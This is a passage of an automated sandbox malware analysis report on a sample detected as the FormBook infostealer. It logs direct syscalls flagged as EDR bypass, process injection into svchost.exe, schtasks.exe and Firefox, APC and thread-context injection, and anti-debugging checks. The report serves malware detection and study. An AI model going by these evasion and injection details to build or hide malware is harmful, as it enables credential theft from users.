            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]2_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread register set: target process: 6468Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread APC queued: target process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30B5008Jump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Doc 784-01965670.exe, jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Doc 784-01965670.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: jEsBIhfnof.exe, 00000003.00000002.4509319119.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000000.2145074168.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509317927.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
